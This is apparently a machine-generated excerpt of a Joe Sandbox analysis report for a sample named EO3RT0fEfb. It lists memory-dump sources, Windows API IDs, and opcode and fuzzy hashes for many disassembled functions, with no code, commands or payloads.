                                                            • Instruction Fuzzy Hash: A001C0E0E482C68BFB04FBA1A8551E9E6A1AF48709FCC0035D54D872A2DF2DA4859731
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                            • Instruction ID: dc38520237c646118ff18ad9d0321765442489c6e29b2c7fa7a7d7add6f4423d
                                                            • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                            • Instruction Fuzzy Hash: 0FE08650F0A1C382FF04BBF278440F8A6915F44B50FCC4034C90D86252DF2CD8864A70
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseErrorHandleLast
                                                            • String ID:
                                                            • API String ID: 918212764-0
                                                            • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                            • Instruction ID: f0ef53532d9312a7feee500081bad18184954e62da41d8e6cb007f84e43d3c9e
                                                            • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                            • Instruction Fuzzy Hash: B0119351B0C6CA41FEA4B774B6942FD96D15F94B64FCC0238EA2E072D2DF6CA8448332
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                            • Instruction ID: 683bc6835a6df585448d3103fc3f895ff7ed2f1ee08779e7f9a536f108354565
                                                            • Opcode Fuzzy Hash: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                            • Instruction Fuzzy Hash: 7732B062A086C286EF65EB1AE5402F9E361FB84B84F8C4131DE4E17795EF3DE541CB20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                            • Instruction ID: fb55ecb0532c207036aa12e112e8a8052bce5d9c418fc3b49a2fc3912d2d15cd
                                                            • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                            • Instruction Fuzzy Hash: 7F414E22B08AC18AEF11EF65E0503EDA7A1EB54B88F884535CE0D57795CF7CE495C7A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: 79a8f9e3fe50e3bd62fad2946b9f3cab9d1411ae91e96718622d0c848b5f8289
                                                            • Instruction ID: 13441e88f40051dc57146a1961d2be50c94fb7e761cc8e87a0ef3a13538b0126
                                                            • Opcode Fuzzy Hash: 79a8f9e3fe50e3bd62fad2946b9f3cab9d1411ae91e96718622d0c848b5f8289
                                                            • Instruction Fuzzy Hash: 90418161E0D6D283EF54BB55F8502F8A266AF40B40FDC4039DA0E4BAD1DF7EE8418760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                            • Instruction ID: eaa91a2647f8fed5ed93150d560b4db953f3f92271ee65cdaa434bb9efb6a6c9
                                                            • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                            • Instruction Fuzzy Hash: C821C4326186C287EF65AF24F5403B9B6A0EB80B94F584334DA9E8B6D5DF2CDC00CB11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                            • Instruction ID: 8ca85950375e2139890430a5b36a8df89893381c96db2b8591a51a163349d3c3
                                                            • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                            • Instruction Fuzzy Hash: D5215322E0E6C6C1EF51AF52B4011BEE2A5BF45B84F984031EA4C5BB96DF7CDC419760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                            • Instruction ID: 7833bcd2a6e1139880e39db94660427be9710613f11ecdc34cad000e7ad8be07
                                                            • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                            • Instruction Fuzzy Hash: BF113D26B19A8585EF44AF15E0943B9A761EB84FD0F985132DE1E073A5CF7CD491C310
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                            • Instruction ID: 5934b1bf13edd955bec8d9f1e7e04e30317d69eedb81bce050e09aa842578de9
                                                            • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                            • Instruction Fuzzy Hash: C3116D6290D6CA86EE05AF60F5402EDF761AB90750FD84132E64D072E6CFBCD441CB21
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 5f4a90eb59d34f8a58853582a43e16d1c8b32088f69f0843c5a4c245a390bb8e
                                                            • Instruction ID: 2a7070131c288afa476d83cb119722a6006d82d2d75787a3d19f13f0261676ef
                                                            • Opcode Fuzzy Hash: 5f4a90eb59d34f8a58853582a43e16d1c8b32088f69f0843c5a4c245a390bb8e
                                                            • Instruction Fuzzy Hash: D5018421E0A2C781FE14BA65B4213F991505F99764FAC0230E92D4B2C7CF2CEC428761
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                            • Instruction ID: 7fb53502f2120c7e0867e61e7f5744344a924bce093caea30772b6e1af1de253
                                                            • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                            • Instruction Fuzzy Hash: 78F09621A0D2C782ED14767574511F9A2805F44794FAC1130E95D462CACF2CD8428621
                                                            APIs
                                                              • Part of subcall function 00007FF75F174970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75F174999
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF75F18C8FE), ref: 00007FF75F14656F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3938577545-0
                                                            • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                            • Instruction ID: 2a2227ed72712a9d0042b8a52c72a59eff0f2c0f76f325d73966eb46c18da2f7
                                                            • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                            • Instruction Fuzzy Hash: 11F05E52E09A85C2FF19FF75E069378A360BB98F8CF580530CA2E4A189DF2CD854C761
                                                            APIs
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF75F164C5C
                                                              • Part of subcall function 00007FF75F165600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF75F165609
                                                              • Part of subcall function 00007FF75F165600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF75F16561A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1680350287-0
                                                            • Opcode ID: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                            • Instruction ID: 4c1ccb89ceb8b3c5caf3fcc840a25d3e6665cd6899aecb8034e12f6be1f665dd
                                                            • Opcode Fuzzy Hash: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                            • Instruction Fuzzy Hash: 32E0B640E1E1C746FE68766136550F981400F58770EDC6B35D93F49BC2EF1CA4518130
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CriticalDeleteSection
                                                            • String ID:
                                                            • API String ID: 166494926-0
                                                            • Opcode ID: 1e503f39ac4771ab9e5c77a385804bbde878bde5e9aec211bf0958570055964e
                                                            • Instruction ID: fc0d910e7c5ccb6ca918e85a4caac6bb20bd7ddcc9732e0e509b25bac0c77ba2
                                                            • Opcode Fuzzy Hash: 1e503f39ac4771ab9e5c77a385804bbde878bde5e9aec211bf0958570055964e
                                                            • Instruction Fuzzy Hash: 21F03095F0D9C641FF00BB65EC917F9A3509FA4B54F8C0235C91D0666ACF1CA8818331
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                            • Instruction ID: 03ab2171106ced3127db89d85fbc93acdf80971fe04f4eb0958dd1647fe1f8c9
                                                            • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                            • Instruction Fuzzy Hash: 9DE03922618A9183DB20DB06F58035AE370FB89BC8F984525EF8C47B19CF7DC5528B80
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                            • Instruction ID: 89501a258439056d9ba56faf4b4c0519bb8113c7cae16848da9f9873e9968ae1
                                                            • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                            • Instruction Fuzzy Hash: 59E04822B0878685DB21E765F6853D9A365FF9C7C4F584031EE8C4375ADE6CC5858B10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                            • Instruction ID: 05f87f18f61379f0b309452b35e15473b56b660afa1e50f08ff3a3ba0e5a0e42
                                                            • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                            • Instruction Fuzzy Hash: 89F058A1A19BC687EB61AB54E4443A9BAA4FB8430CF880039D28D07795CF3CD305CB61
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Open_onexit
                                                            • String ID:
                                                            • API String ID: 3030063568-0
                                                            • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                            • Instruction ID: 8888484a7f1f7bd272a1b4bfdc6da6d66aabd165d7f6a499ae5ac393daa5e406
                                                            • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                            • Instruction Fuzzy Hash: 01E0EC91F1A5CF80EE08B76AE9850F893916F95709FC85936C00E82691EF1CD2968731
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                            • Instruction ID: 59a96253b7b04de2c82470c6de816c5d620d73a5f0c577a575330d4f2d8bc9b5
                                                            • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                            • Instruction Fuzzy Hash: 99C01200F590CB80ED0873BA6C8A0F442904FE9700FD80975D00E80682DF0C51E64731
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
